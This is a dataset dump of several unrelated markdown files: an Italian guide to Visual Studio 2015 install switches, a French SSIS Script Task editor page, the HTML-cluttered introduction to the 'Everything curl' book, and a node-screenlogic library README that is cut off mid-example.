fa5285db5389322af64220a196baead1c1727a47 | 5,207 | md | Markdown | docs/vs-2015/install/use-command-line-parameters-to-install-visual-studio.md | adrianodaddiego/visualstudio-docs.it-it | b2651996706dc5cb353807f8448efba9f24df130 | [
"CC-BY-4.0",
"MIT"
] | null | null | null | docs/vs-2015/install/use-command-line-parameters-to-install-visual-studio.md | adrianodaddiego/visualstudio-docs.it-it | b2651996706dc5cb353807f8448efba9f24df130 | [
"CC-BY-4.0",
"MIT"
] | null | null | null | docs/vs-2015/install/use-command-line-parameters-to-install-visual-studio.md | adrianodaddiego/visualstudio-docs.it-it | b2651996706dc5cb353807f8448efba9f24df130 | [
"CC-BY-4.0",
"MIT"
] | null | null | null | ---
title: Usare i parametri della riga di comando per installare Visual Studio 2015 | Microsoft Docs
titleSuffix: ''
ms.date: 11/15/2016
ms.prod: visual-studio-dev14
ms.technology: vs-ide-install
ms.topic: conceptual
f1_keywords:
- command-line parameters
- switches
- command prompt
ms.assetid: 480f3cb4-d873-434e-a8bf-82cff7401cf2
caps.latest.revision: 10
author: TerryGLee
ms.author: tglee
manager: jillfra
ms.openlocfilehash: a3fe0233f08f33535be4b02cc06c29d919d75169
ms.sourcegitcommit: 53aa5a413717a1b62ca56a5983b6a50f7f0663b3
ms.translationtype: MT
ms.contentlocale: it-IT
ms.lasthandoff: 04/17/2019
ms.locfileid: "59651163"
---
# <a name="use-command-line-parameters-to-install-visual-studio"></a>Usare i parametri della riga di comando per installare Visual Studio
[!INCLUDE[vs2017banner](../includes/vs2017banner.md)]
Per la documentazione più recente di Visual Studio, vedere [usare i parametri della riga di comando per installare Visual Studio](/visualstudio/install/use-command-line-parameters-to-install-visual-studio).
Quando si installa Visual Studio 2015 da un prompt dei comandi è possibile usare i seguenti parametri della riga di comando, chiamati anche opzioni.
> [!NOTE]
> Assicurarsi di usare il programma di installazione effettivo e non il file di programma di avvio automatico. Ad esempio, assicurarsi che usi **`vs_enterprise.exe`** anziché vs_enterprise_*GUID*.exe. È possibile scaricare un programma di installazione dal [My.VisualStudio.com](https://my.visualstudio.com/downloads?q=visual%20studio%20enterprise%202015).
## <a name="list-of-command-line-parameters"></a>Elenco dei parametri della riga di comando
Per i parametri della riga di comando di Visual Studio non si fa distinzione tra maiuscole e minuscole.
|Parametro|Descrizione|
|---------------|-----------------|
|**/?**<br /><br /> **/help**<br /><br /> **/h**|Visualizza i parametri della riga di comando.|
|**/AddRemoveFeatures**|Specifica le funzionalità da aggiungere o rimuovere dal prodotto installato.|
|**/AdminFile** *AdminDeployment.xml*|Installa Visual Studio tramite il file di dati specificato per l'installazione amministrativa.|
|**/ChainingPackage** *BundleName*|Specifica quale bundle è concatenato a questo bundle. Può anche essere usato per specificare una coorte nel programma Analisi utilizzo software.|
|**/CreateAdminFile \<filename>**|Specifica il percorso per creare un file di controllo che può essere usato con /AdminFile|
|**/CustomInstallPath** *InstallationDirectory*|Installa tutti i pacchetti con destinazione modificabile nella directory specificata.|
|**/ForceRestart**|Riavvia sempre il computer dopo l'installazione.|
|**/full**|Installa tutte le funzionalità del prodotto.|
|**/Installselectableitems \<nome dell'elemento 1 > [;\< nome dell'elemento 2 >]**|Elenco di elementi dell'albero per la selezione da controllare nella schermata di selezione dell'installazione guidata.|
|**/l**<br /><br /> **/ Accedere** *nomefile*|Specifica un percorso per il file di log.|
|**/layout** *Directory*|Copia i file sul supporto di installazione nella directory specificata.|
|**/NoCacheOnlyMode**|Impedisce il prepopolamento della cache del pacchetto.|
|**/NoRefresh**|Impedisce il controllo nelle versioni più recenti di questo prodotto della disponibilità di versioni aggiornate richieste o consigliate.|
|**/norestart**|Impedisce il riavvio dell'applicazione di installazione dal computer durante o dopo l'installazione. Per i codici restituiti da cercare, vedere la sezione della [Guida per l'amministratore di Visual Studio](../install/visual-studio-administrator-guide.md).|
|**/noweb**|Impedisce l'installazione da Internet.|
|**/Overridefeeduri \<percorso file del feed >**|Percorso di un feed esterno locale che descrive gli elementi software|
|**/ProductKey**<br /><br /> *ProductKey*|Imposta un codice Product Key personalizzato che non includa trattini e non contenga più di 25 caratteri.|
|**/PromptRestart**|Richiede una conferma all'utente prima di riavviare il computer.|
|**/q**<br /><br /> **/quiet**<br /><br /> **/s**<br /><br /> **/silent**|Elimina l'interfaccia utente (UI) per l'applicazione di installazione. Se Visual Studio è già installato e non vengono specificati altri parametri tranne questo, l'applicazione di installazione viene eseguita in modalità di manutenzione.|
|**/qb**<br /><br /> **/passive**|Mostra l'avanzamento ma non attende l'input dell'utente.|
|**/repair**|Ripristina Visual Studio.|
|**/SuppressRefreshPrompt**|Impedisce la visualizzazione della finestra di dialogo che informa della disponibilità dell'aggiornamento. In tal modo, l'installazione guidata accetterà automaticamente eventuali versioni aggiornate richieste o consigliate.|
|**/u**<br /><br /> **/Uninstall**|Disinstalla [!INCLUDE[vsprvs](../includes/vsprvs-md.md)].|
|**/Uninstall /Force**<br /><br /> **/u /force**|Disinstalla Visual Studio e tutte le funzionalità condivise con altri prodotti. **Avviso:** Se si usa questo parametro, altri prodotti installati nello stesso computer potrebbero smettere di funzionare correttamente.|
## <a name="see-also"></a>Vedere anche
- [Guida di Visual Studio Administrator](../install/visual-studio-administrator-guide.md) | 77.716418 | 356 | 0.770693 | ita_Latn | 0.988956 |
fa53bd581bfad6e6487bdf8808e76c8c1efd8258 | 5,563 | md | Markdown | docs/integration-services/extending-packages-scripting/task/configuring-the-script-task-in-the-script-task-editor.md | zelanko/sql-docs.fr-fr | 27bf5ccdbf98932e6c384c58b7fecf37fc525190 | [
"CC-BY-4.0",
"MIT"
] | null | null | null | docs/integration-services/extending-packages-scripting/task/configuring-the-script-task-in-the-script-task-editor.md | zelanko/sql-docs.fr-fr | 27bf5ccdbf98932e6c384c58b7fecf37fc525190 | [
"CC-BY-4.0",
"MIT"
] | null | null | null | docs/integration-services/extending-packages-scripting/task/configuring-the-script-task-in-the-script-task-editor.md | zelanko/sql-docs.fr-fr | 27bf5ccdbf98932e6c384c58b7fecf37fc525190 | [
"CC-BY-4.0",
"MIT"
] | null | null | null | ---
description: Configuration de la tâche de script dans l'éditeur de tâche de script
title: Configuration de la tâche de script dans l’éditeur de tâche de script | Microsoft Docs
ms.custom: ''
ms.date: 03/15/2017
ms.prod: sql
ms.prod_service: integration-services
ms.reviewer: ''
ms.technology: integration-services
ms.topic: reference
dev_langs:
- VB
helpviewer_keywords:
- Script task [Integration Services], configuring
- Script Task Editor
- SSIS Script task, configuring
ms.assetid: 232de0c9-b24d-4c38-861d-6c1f4a75bdf3
author: chugugrace
ms.author: chugu
ms.openlocfilehash: 8b4a052ea59e3c72adda887c3084bca278059f0b
ms.sourcegitcommit: 192f6a99e19e66f0f817fdb1977f564b2aaa133b
ms.translationtype: HT
ms.contentlocale: fr-FR
ms.lasthandoff: 11/25/2020
ms.locfileid: "96122929"
---
# <a name="configuring-the-script-task-in-the-script-task-editor"></a>Configuration de la tâche de script dans l'éditeur de tâche de script
[!INCLUDE[sqlserver-ssis](../../../includes/applies-to-version/sqlserver-ssis.md)]
Avant d’écrire du code personnalisé dans la tâche de script, vous devez configurer ses propriétés principales dans les trois pages de l’**éditeur de tâche de script**. Vous pouvez configurer des propriétés de tâche supplémentaires qui ne sont pas propres à la tâche de script à l'aide de la fenêtre Propriétés.
> [!NOTE]
> Contrairement aux versions antérieures pour lesquelles il était possible d'indiquer si les scripts étaient précompilés, tous les scripts sont compilés à partir de [!INCLUDE[ssISversion10](../../../includes/ssisversion10-md.md)].
## <a name="general-page-of-the-script-task-editor"></a>Page Général de l'éditeur de tâche de script
La page **Général** de l’**éditeur de tâche de script** vous permet d’assigner un nom unique et une description à la tâche de script.
## <a name="script-page-of-the-script-task-editor"></a>Page Script de l'éditeur de tâche de script
La page **Script** de l’**éditeur de tâche de script** affiche les propriétés personnalisées de la tâche de script.
### <a name="scriptlanguage-property"></a>Propriété ScriptLanguage
[!INCLUDE[msCoName](../../../includes/msconame-md.md)] [!INCLUDE[vsprvs](../../../includes/vsprvs-md.md)] Tools for Applications (VSTA) prend en charge les langages de programmation [!INCLUDE[msCoName](../../../includes/msconame-md.md)] Visual Basic ou [!INCLUDE[msCoName](../../../includes/msconame-md.md)] Visual C#. Après avoir créé un script dans la tâche de script, vous ne pouvez pas modifier la valeur de la propriété **ScriptLanguage**.
Pour définir le langage de script par défaut des composants Script et des tâches de script, utilisez la propriété **ScriptLanguage** dans la page **Général** de la boîte de dialogue **Options**. Pour plus d'informations, consultez [General Page](../../general-page-of-integration-services-designers-options.md).
### <a name="entrypoint-property"></a>Propriété EntryPoint
La propriété **EntryPoint** spécifie la méthode de la classe **ScriptMain** du projet VSTA qui est appelée par le runtime [!INCLUDE[ssISnoversion](../../../includes/ssisnoversion-md.md)] comme point d’entrée dans le code de tâche de script. La classe **ScriptMain** est la classe par défaut générée par les modèles de script.
Si vous modifiez le nom de la méthode dans le projet VSTA, vous devez modifier la valeur de la propriété **EntryPoint** .
### <a name="readonlyvariables-and-readwritevariables-properties"></a>Propriétés ReadOnlyVariables et ReadWriteVariables
Vous pouvez entrer des listes délimitées par des virgules de variables existantes comme valeurs de ces propriétés pour rendre les variables accessibles en lecture seule ou en lecture/écriture dans le code de tâche de script. Les deux types de variables sont accessibles dans le code par le biais de la propriété <xref:Microsoft.SqlServer.Dts.Tasks.ScriptTask.ScriptObjectModel.Variables%2A> de l’objet **Dts**. Pour plus d’informations, consultez [Utilisation de variables dans la tâche de script](../../../integration-services/extending-packages-scripting/task/using-variables-in-the-script-task.md).
> [!NOTE]
> Les noms de variable respectent la casse.
Pour sélectionner les variables, cliquez sur le bouton de sélection ( **...** ) situé en regard du champ de propriété. Pour plus d’informations, consultez [Sélectionner des variables, page](../../../integration-services/control-flow/select-variables-page.md).
### <a name="edit-script-button"></a>Bouton Modifier le script
Le bouton **Modifier le script** lance l’environnement de développement VSTA dans lequel vous écrivez votre script personnalisé. Pour plus d’informations, consultez [Codage et débogage de la tâche de script](../../../integration-services/extending-packages-scripting/task/coding-and-debugging-the-script-task.md).
## <a name="expressions-page-of-the-script-task-editor"></a>Page Expressions de l'éditeur de tâche de script
La page **Expressions** de l’**éditeur de tâche de script** vous permet d’utiliser des expressions pour fournir les valeurs des propriétés de la tâche de script répertoriées ci-dessus et de nombreuses autres propriétés de tâche. Pour plus d’informations, consultez [Expressions Integration Services (SSIS)](../../../integration-services/expressions/integration-services-ssis-expressions.md).
## <a name="see-also"></a>Voir aussi
[Codage et débogage de la tâche de script](../../../integration-services/extending-packages-scripting/task/coding-and-debugging-the-script-task.md)
| 78.352113 | 604 | 0.760022 | fra_Latn | 0.889909 |
fa545a574b9eae2d1c258dfc4570905ce9235e98 | 13,131 | md | Markdown | _MARKDOWN/index.md | bgoonz/everything-curl | 8ca7f990128ed818535fabd0d51e712c68725ebe | [
"RSA-MD",
"Linux-OpenIB"
] | null | null | null | _MARKDOWN/index.md | bgoonz/everything-curl | 8ca7f990128ed818535fabd0d51e712c68725ebe | [
"RSA-MD",
"Linux-OpenIB"
] | 4 | 2021-08-31T07:34:54.000Z | 2021-10-14T19:42:56.000Z | _MARKDOWN/index.md | bgoonz/everything-curl | 8ca7f990128ed818535fabd0d51e712c68725ebe | [
"RSA-MD",
"Linux-OpenIB"
] | null | null | null | <a href="index.html" class="navButton-94f2579c--navButtonClickable-161b88ca--navButtonOpened-6a88552e">
</a>
<a href="bindings.html" class="navButton-94f2579c--navButtonClickable-161b88ca">href="bookindex.html" class="navButton-94f2579c--navButtonClickable-161b88ca">
</a>
# <span class="text-4505230f--DisplayH900-bfb998fa--textContentFamily-49a318e1">Introduction</span>
<span class="text-4505230f--UIH300-2063425d--textUIFamily-5ebd8e40--text-8ee2c8b2">
</span>
<span class="text-4505230f--UIH300-2063425d--textUIFamily-5ebd8e40--text-8ee2c8b2">
</span>
<span class="text-4505230f--TextH400-3033861f--textContentFamily-49a318e1">
<span data-key="c850d034709e428cae4b32969307c325">
<span data-offset-key="c850d034709e428cae4b32969307c325:0">_Everything curl_</span>
<span data-offset-key="c850d034709e428cae4b32969307c325:1"> is an extensive guide for all things curl. The project, the command-line tool, the library, how everything started and how it came to be the useful tool it is today.</span>
</span>
</span>
<span class="text-4505230f--TextH400-3033861f--textContentFamily-49a318e1">
<span data-key="4895bd62b2dc40d289076043df05b99e">
<span data-offset-key="4895bd62b2dc40d289076043df05b99e:0">This guide explains how we work on developing it further, what it takes to use it, how you can contribute with code or bug reports and why millions of existing users use it.</span>
</span>
</span>
<span class="text-4505230f--TextH400-3033861f--textContentFamily-49a318e1">
<span data-key="ade032317f4b482aa797ba6a65819125">
<span data-offset-key="ade032317f4b482aa797ba6a65819125:0">This book is meant to be interesting and useful to both casual readers and somewhat more experienced developers. It offers something for everyone to pick and choose from.</span>
</span>
</span>
<span class="text-4505230f--TextH400-3033861f--textContentFamily-49a318e1">
<span data-key="063fd3f41f194512b4153ae9bb7d13e1">
<span data-offset-key="063fd3f41f194512b4153ae9bb7d13e1:0">Do not try to read it from front to back. Read the chapters or content you are curious about and flip back and forth as you see fit.</span>
</span>
</span>
<span class="text-4505230f--TextH400-3033861f--textContentFamily-49a318e1">
<span data-key="3173dea1a941499fbaedb872dca6b4ac">
<span data-offset-key="3173dea1a941499fbaedb872dca6b4ac:0">I hope to run this book project as I do all other projects I work on: in the open, completely free to download and read. I want it to be free for anyone to comment on, and available for everyone to contribute to and help out with.</span>
</span>
</span>
<span class="text-4505230f--TextH400-3033861f--textContentFamily-49a318e1">
<span data-key="b627127cb59a4176b9061fa1690af56c">
<span data-offset-key="b627127cb59a4176b9061fa1690af56c:0">Send your bug reports, pull requests or critiques to me and I will improve this book accordingly.</span>
</span>
</span>
<span class="text-4505230f--TextH400-3033861f--textContentFamily-49a318e1">
<span data-key="2725c05ec99a4275bd73ea0802039a80">
<span data-offset-key="2725c05ec99a4275bd73ea0802039a80:0">This book will never be finished. I intend to keep working on it. While I may at some point consider it fairly complete, covering most aspects of the project (even if only that seems like an insurmountable goal), the curl project will continue to move so there will always be things to update in the book as well.</span>
</span>
</span>
<span class="text-4505230f--TextH400-3033861f--textContentFamily-49a318e1">
<span data-key="f2a41d0a57264d57ba3fd00968560982">
<span data-offset-key="f2a41d0a57264d57ba3fd00968560982:0">This book project started at the end of September 2015.</span>
</span>
</span>
<span class="text-4505230f--HeadingH700-04e1a2a3--textContentFamily-49a318e1">
<span data-key="4116192b5bb74241aa3399681ca74206">
<span data-offset-key="4116192b5bb74241aa3399681ca74206:0">The book sites</span>
</span>
</span>
<span class="text-4505230f--TextH400-3033861f--textContentFamily-49a318e1">
<span data-key="954edac7eed344d98422ec1608fd9562">
<span data-offset-key="954edac7eed344d98422ec1608fd9562:0">
<span data-slate-zero-width="z"></span>
</span>
</span>
<a href="index.html" class="link-a079aa82--primary-53a25e66--link-faf6c434">
<span data-key="d7157918e7584688870a249b62c70ecd">
<span data-offset-key="d7157918e7584688870a249b62c70ecd:0">https://everything.curl.dev</span>
</span>
</a>
<span data-key="5e5722a7acc64ceea4cb452e2e1d56ec">
<span data-offset-key="5e5722a7acc64ceea4cb452e2e1d56ec:0"> is the home of this book. It features accessible links to read the book online in a web version, or download a PDF version for offline reading. Unfortunately, the previously provided ebook formats are no longer provided by gitbook.com that we use to produce the book.</span>
</span>
</span>
<span class="text-4505230f--TextH400-3033861f--textContentFamily-49a318e1">
<span data-key="129a7a94f256493e981a658ab858f96a">
<span data-offset-key="129a7a94f256493e981a658ab858f96a:0">
<span data-slate-zero-width="z"></span>
</span>
</span>
<a href="https://github.com/bagder/everything-curl" class="link-a079aa82--primary-53a25e66--link-faf6c434">
<span data-key="b6c1fc36790f49a6956e88b743ff1bbe">
<span data-offset-key="b6c1fc36790f49a6956e88b743ff1bbe:0">https://github.com/bagder/everything-curl</span>
</span>
</a>
<span data-key="c612c96479724a5aba01c387811501d2">
<span data-offset-key="c612c96479724a5aba01c387811501d2:0"> hosts all the book content.</span>
</span>
</span>
<span class="text-4505230f--HeadingH700-04e1a2a3--textContentFamily-49a318e1">
<span data-key="172da1eaa4c5432f8d5a53a69793b643">
<span data-offset-key="172da1eaa4c5432f8d5a53a69793b643:0">The author</span>
</span>
</span>
<span class="text-4505230f--TextH400-3033861f--textContentFamily-49a318e1">
<span data-key="842cebf9336d4e84995a6a5cfcf5127b">
<span data-offset-key="842cebf9336d4e84995a6a5cfcf5127b:0">With the hope of becoming just a co-author of this material, I am Daniel Stenberg. I founded the curl project and I'm a developer at heart—for fun and profit. I live and work in Stockholm, Sweden.</span>
</span>
</span>
<span class="text-4505230f--TextH400-3033861f--textContentFamily-49a318e1">
<span data-key="15650e33123443c6b7af7086892fab87">
<span data-offset-key="15650e33123443c6b7af7086892fab87:0">All there is to know about me can be found on </span>
</span>
<a href="https://daniel.haxx.se/" class="link-a079aa82--primary-53a25e66--link-faf6c434">
<span data-key="e89991354fa74c0a8ea4bcad3f2901ad">
<span data-offset-key="e89991354fa74c0a8ea4bcad3f2901ad:0">my web site</span>
</span>
</a>
<span data-key="7fbf1dad63c841cf8b7d93f24916356a">
<span data-offset-key="7fbf1dad63c841cf8b7d93f24916356a:0">.</span>
</span>
</span>
<span class="text-4505230f--HeadingH700-04e1a2a3--textContentFamily-49a318e1">
<span data-key="372c7cd1f8464d1e9146e06dfd8873d4">
<span data-offset-key="372c7cd1f8464d1e9146e06dfd8873d4:0">Help</span>
</span>
</span>
<span class="text-4505230f--TextH400-3033861f--textContentFamily-49a318e1">
<span data-key="e54ac37f109c47889227436c955658ba">
<span data-offset-key="e54ac37f109c47889227436c955658ba:0">If you find mistakes, omissions, errors or blatant lies in this document, please send me a refreshed version of the affected paragraph and I will make amended versions. I will give proper credits to everyone who helps out! I hope to make this document better over time.</span>
</span>
</span>
<span class="text-4505230f--TextH400-3033861f--textContentFamily-49a318e1">
<span data-key="44c96297130f4c0fa751c9d56df73ca9">
<span data-offset-key="44c96297130f4c0fa751c9d56df73ca9:0">Preferably, you could submit </span>
</span>
<a href="https://github.com/bagder/everything-curl/issues" class="link-a079aa82--primary-53a25e66--link-faf6c434">
<span data-key="ebd69ed3660941abb1e1c34f64d26efe">
<span data-offset-key="ebd69ed3660941abb1e1c34f64d26efe:0">errors</span>
</span>
</a>
<span data-key="b2cb1bfb6a0c4800b02e71f02f153b4c">
<span data-offset-key="b2cb1bfb6a0c4800b02e71f02f153b4c:0"> or </span>
</span>
<a href="https://github.com/bagder/everything-curl/pulls" class="link-a079aa82--primary-53a25e66--link-faf6c434">
<span data-key="d93c5778a0bc4b0fb933cc53e292f809">
<span data-offset-key="d93c5778a0bc4b0fb933cc53e292f809:0">pull requests</span>
</span>
</a>
<span data-key="e74ba8a57ef040ec9af6169a9c79fe91">
<span data-offset-key="e74ba8a57ef040ec9af6169a9c79fe91:0"> on the book's GitHub page.</span>
</span>
</span>
<span class="text-4505230f--HeadingH700-04e1a2a3--textContentFamily-49a318e1">
<span data-key="c93c14a2f5cc47929f0b2a2ef2ae9653">
<span data-offset-key="c93c14a2f5cc47929f0b2a2ef2ae9653:0">Helpers</span>
</span>
</span>
<span class="text-4505230f--TextH400-3033861f--textContentFamily-49a318e1">
<span data-key="2a8ee6b7b5b14b0da8af8ce5c83e6b33">
<span data-offset-key="2a8ee6b7b5b14b0da8af8ce5c83e6b33:0">Lots of people have reported bugs, improved sections or otherwise helped making this book the success it is. These friends include the following:</span>
</span>
</span>
<span class="text-4505230f--TextH400-3033861f--textContentFamily-49a318e1">
<span data-key="b723c28541204f72b891425b15fb2bad">
<span data-offset-key="b723c28541204f72b891425b15fb2bad:0">AaronChen0 on github, alawvt on github, Amin Khoshnood, amnkh on github, Anders Roxell, Angad Gill, Aris (Karim) Merchant, Ben Bodenmiller, Ben Peachey, bookofportals on github, Carlton Gibson, Chris DeLuca, Citizen Esosa, Dan Fandrich, Daniel Sabsay, David Piano, DrDoom74 at GitHub, Emil Hessman, enachos71 on github, ethomag on github, Frank Dana, Frank Hassanabad, Gautham B A, Geir Hauge, Helena Udd, Hubert Lin, i-ky on github, infinnovation-dev on GitHub, Jay Ottinger, Jay Satiro, John Simpson, JohnCoconut on github, JoyIfBam5, lowttl on github, Luca Niccoli, Manuel on github, Marius Žilėnas, Mark Koester, Martin van den Nieuwelaar, mehandes on github, Michael Kaufmann, Ms2ger, Nick Travers, Nicolas Brassard, Oscar on github, Patrik Lundin, Ryan McQuen, Saravanan Musuwathi Kesavan, Senthil Kumaran, Shusen Liu, Spiros Georgaras, Stephen, Steve Holme, strupo on github, Viktor Szakats, Vitaliy T, Wayne Lai Wieland Hoffmann, 谭九鼎</span>
</span>
</span>
<span class="text-4505230f--HeadingH700-04e1a2a3--textContentFamily-49a318e1">
<span data-key="d4e1489070424163a3a671e60116c832">
<span data-offset-key="d4e1489070424163a3a671e60116c832:0">License</span>
</span>
</span>
<span class="text-4505230f--TextH400-3033861f--textContentFamily-49a318e1">
<span data-key="0d9afd0819ce4ca9bd1a40acd88a76a1">
<span data-offset-key="0d9afd0819ce4ca9bd1a40acd88a76a1:0">This document is licensed under the </span>
</span>
<a href="https://creativecommons.org/licenses/by/4.0/" class="link-a079aa82--primary-53a25e66--link-faf6c434">
<span data-key="0de9f984586249299a124f6802b4b28b">
<span data-offset-key="0de9f984586249299a124f6802b4b28b:0">Creative Commons Attribution 4.0 license</span>
</span>
</a>
<span data-key="2b316ea105804e56addff3e8ef7ba753">
<span data-offset-key="2b316ea105804e56addff3e8ef7ba753:0">.</span>
</span>
</span>
<a href="how-to-read.html" class="reset-3c756112--card-6570f064--whiteCard-fff091a4--cardNext-19241c42">
</a>
<span class="text-4505230f--UIH400-4e41e82a--textContentFamily-49a318e1">How to read this book</span>
<span class="text-4505230f--InfoH100-1e92e1d1--textContentFamily-49a318e1">Contents</span>
<a href="index.html#the-book-sites" class="reset-3c756112--menuItem-aa02f6ec--menuItemLight-757d5235--menuItemInline-173bdf97--pageTocItem-f4427024">
</a>
<span class="text-4505230f--UIH300-2063425d--textContentFamily-49a318e1">
<span class="text-4505230f--UIH200-50ead35f--textContentFamily-49a318e1">The book sites</span>
</span>
<a href="index.html#the-author" class="reset-3c756112--menuItem-aa02f6ec--menuItemLight-757d5235--menuItemInline-173bdf97--pageTocItem-f4427024">
</a>
<span class="text-4505230f--UIH300-2063425d--textContentFamily-49a318e1">
<span class="text-4505230f--UIH200-50ead35f--textContentFamily-49a318e1">The author</span>
</span>
<a href="index.html#help" class="reset-3c756112--menuItem-aa02f6ec--menuItemLight-757d5235--menuItemInline-173bdf97--pageTocItem-f4427024">
</a>
<span class="text-4505230f--UIH300-2063425d--textContentFamily-49a318e1">
<span class="text-4505230f--UIH200-50ead35f--textContentFamily-49a318e1">Help</span>
</span>
<a href="index.html#helpers" class="reset-3c756112--menuItem-aa02f6ec--menuItemLight-757d5235--menuItemInline-173bdf97--pageTocItem-f4427024">
</a>
<span class="text-4505230f--UIH300-2063425d--textContentFamily-49a318e1">
<span class="text-4505230f--UIH200-50ead35f--textContentFamily-49a318e1">Helpers</span>
</span>
<a href="index.html#license" class="reset-3c756112--menuItem-aa02f6ec--menuItemLight-757d5235--menuItemInline-173bdf97--pageTocItem-f4427024">
</a>
<span class="text-4505230f--UIH300-2063425d--textContentFamily-49a318e1">
<span class="text-4505230f--UIH200-50ead35f--textContentFamily-49a318e1">License</span>
</span>
| 32.664179 | 1,007 | 0.781052 | yue_Hant | 0.364701 |
fa552d4a5e0303dcc62c25e8372cfa0b0d968c6d | 11 | md | Markdown | _includes/01-name.md | BigFish2086/markdown-portfolio | c1490723d874705cd2e1e912629e856b3171b05c | [
"MIT"
] | null | null | null | _includes/01-name.md | BigFish2086/markdown-portfolio | c1490723d874705cd2e1e912629e856b3171b05c | [
"MIT"
] | null | null | null | _includes/01-name.md | BigFish2086/markdown-portfolio | c1490723d874705cd2e1e912629e856b3171b05c | [
"MIT"
] | null | null | null | ## BigFish
| 5.5 | 10 | 0.636364 | eng_Latn | 0.984343 |
fa5556c89a09d73243b0c21f3f5e1403dc16ac13 | 46,839 | md | Markdown | README.md | parnic/ScreenLogicConnect-NodeJS | 125ea54421a1c153baa9e35ec9ebdccf79410834 | [
"MIT"
] | null | null | null | README.md | parnic/ScreenLogicConnect-NodeJS | 125ea54421a1c153baa9e35ec9ebdccf79410834 | [
"MIT"
] | null | null | null | README.md | parnic/ScreenLogicConnect-NodeJS | 125ea54421a1c153baa9e35ec9ebdccf79410834 | [
"MIT"
] | null | null | null | # node-screenlogic
This is a Node.JS library for interfacing with Pentair ScreenLogic systems over your local network or remotely through the Pentair dispatcher. Local connections require a Pentair ScreenLogic device on the same network (a network which supports UDP broadcasts).
Tested with a Pentair ScreenLogic system on firmware versions 5.2 Build 736.0 Rel, 5.2 Build 738.0 Rel
* [Usage](#usage)
* [Notes](#notes)
* [Packet format](#packet-format)
* [API reference](#api-reference)
* [FindUnits](#findunits)
* [RemoteLogin](#remotelogin)
* [UnitConnection](#unitconnection)
* [All messages](#all-messages)
* [SLAddClient](#sladdclient)
* [SLAddNewScheduleEvent](#sladdnewscheduleevent)
* [SLCancelDelay](#slcanceldelay)
* [SLChemDataMessage](#slchemdatamessage)
* [SLControllerConfigMessage](#slcontrollerconfigmessage)
* [SLDeleteScheduleEventById](#sldeletescheduleeventbyid)
* [SLGetChemHistoryData](#slgetchemhistorydata)
* [SLGetGatewayDataMessage](#slgetgatewaydatamessage)
* [SLGetHistoryData](#slgethistorydata)
* [SLGetPumpStatus](#slgetpumpstatus)
* [SLGetScheduleData](#slgetscheduledata)
* [SLGetSystemTime](#slgetsystemtime)
* [SLLightControlMessage](#sllightcontrolmessage)
* [SLPingServerMessage](#slpingservermessage)
* [SLPoolStatusMessage](#slpoolstatusmessage)
* [SLRemoveClient](#slremoveclient)
* [SLSaltCellConfigMessage](#slsaltcellconfigmessage)
* [SLSetCircuitRuntimeById](#slsetcircuitruntimebyid)
* [SLSetCircuitStateMessage](#slsetcircuitstatemessage)
* [SLSetHeatModeMessage](#slsetheatmodemessage)
* [SLSetHeatSetPointMessage](#slsetheatsetpointmessage)
* [SLSetPumpFlow](#slsetpumpflow)
* [SLSetSaltCellConfigMessage](#slsetsaltcellconfigmessage)
* [SLSetScheduleEventById](#slsetscheduleeventbyid)
* [SLSetSystemTime](#slsetsystemtime)
* [SLVersionMessage](#slversionmessage)
## Usage
See example.js for an example of interfacing with the library. Broadly, import the library with
```javascript
const ScreenLogic = require('node-screenlogic');
```
then for local connections create a new ScreenLogic unit finder with
```javascript
new ScreenLogic.FindUnits();
```
Hook its `serverFound` event with
```javascript
.on('serverFound', function(server) { })
```
and call it via `search()`. This performs a UDP broadcast on 255.255.255.255, port 1444, so ensure your network supports UDP broadcasts and the device is on the same subnet.
Alternatively, to find a unit remotely, create a new ScreenLogic remote login with
```javascript
new ScreenLogic.RemoteLogin('Pentair: xx-xx-xx')
```
Hook its `gatewayFound` event with
```javascript
.on('gatewayFound', function(unit) { })
```
and call it via `connect()`. This opens a TCP connection to screenlogicserver.pentair.com, port 500.
When a local or remote server is found, create a new UnitConnection with
```javascript
new ScreenLogic.UnitConnection(server);
```
or
```javascript
new ScreenLogic.UnitConnection(unit.port, unit.ipAddr, '1234')
```
where `'1234'` is the remote login password.
Once you've connected with `connect()`, there are a number of methods available and corresponding events for when they've completed successfully. See [UnitConnection](#unitconnection) API reference.
All communication with a ScreenLogic unit is done via TCP, so responses will come back in the order they were requested.
## Notes
Contributions welcome. There are lots of available messages supported by ScreenLogic that the app doesn't support yet, but can be added pretty easily as needed.
## Packet format
All ScreenLogic packets are sent with an 8-byte header. The first 2 bytes are a little-endian-encoded sender ID (which is normally specified when making the original request). The second 2 bytes are a little-endian-encoded message ID. The final 4 bytes are a little-endian-encoded length of the data payload on the packet. The data payload is handled per-message.
## API Reference
Pull requests to document undocumented properties are most welcome.
### FindUnits
#### constructor()
Examples:
```javascript
const ScreenLogic = require('node-screenlogic');
var finder = new ScreenLogic.FindUnits();
```
#### search()
Issues one UDP broadcast search for available units. Since this is a stateless UDP query, the connection will not automatically be closed, so you may need to issue another search if the first one doesn't work, if your network connection is not established, etc. There is no automatic timeout or retry mechanism built in to this command.
#### close()
Closes the socket.
#### Events
* `close` - Indicates that `close()` has been called on the finder.
* `error` - Indicates that an unhandled error was caught.
* `serverFound` - Indicates that a ScreenLogic unit has been found. Event handler receives a [`UnitConnection`](#unitconnection) object.
Examples:
```javascript
finder.on('serverFound', function(server) {
var client = new ScreenLogic.UnitConnection(server);
})
```
* `error` - Indicates that an unhandled error was caught (such as the connection timing out)
### RemoteLogin
#### constructor(systemName)
Argument is the name of a system to connect to in "Pentair: xx-xx-xx" format.
Example:
```javascript
const ScreenLogic = require('./index');
var remoteLogin = new ScreenLogic.RemoteLogin('Pentair: xx-xx-xx');
```
#### connect()
Connects to the dispatcher service and searches for the unit passed to its constructor.
#### close()
Closes the connection
#### Events
* `close` - Indicates that the connection to the remote login server has been closed. Event handler receives a bool indicating whether there was a transmission error.
* `error` - Indicates that an unhandled error was caught (such as the connection timing out).
* `gatewayFound` - Indicates that the search for the named unit has completed (may or may not be successful). Event handler receives a [`SLGetGatewayDataMessage`](#slgetgatewaydatamessage) argument.
### UnitConnection
#### constructor(server)
Argument is a server returned from [`FindUnits`](#findunits) `serverFound` event.
Examples:
```javascript
finder.on('serverFound', function(server) {
var client = new ScreenLogic.UnitConnection(server);
})
```
```javascript
remoteLogin.on('gatewayFound', function(unit) {
if (unit && unit.gatewayFound) {
var client = new ScreenLogic.UnitConnection(unit.port, unit.ipAddr, '1234'));
}
});
```
#### constructor(port, address, password)
Port is an integer. Address is an IPv4 address of the server as a string. Password is optional; should be the 4-digit password in string form, e.g. `'1234'`.
Examples:
```javascript
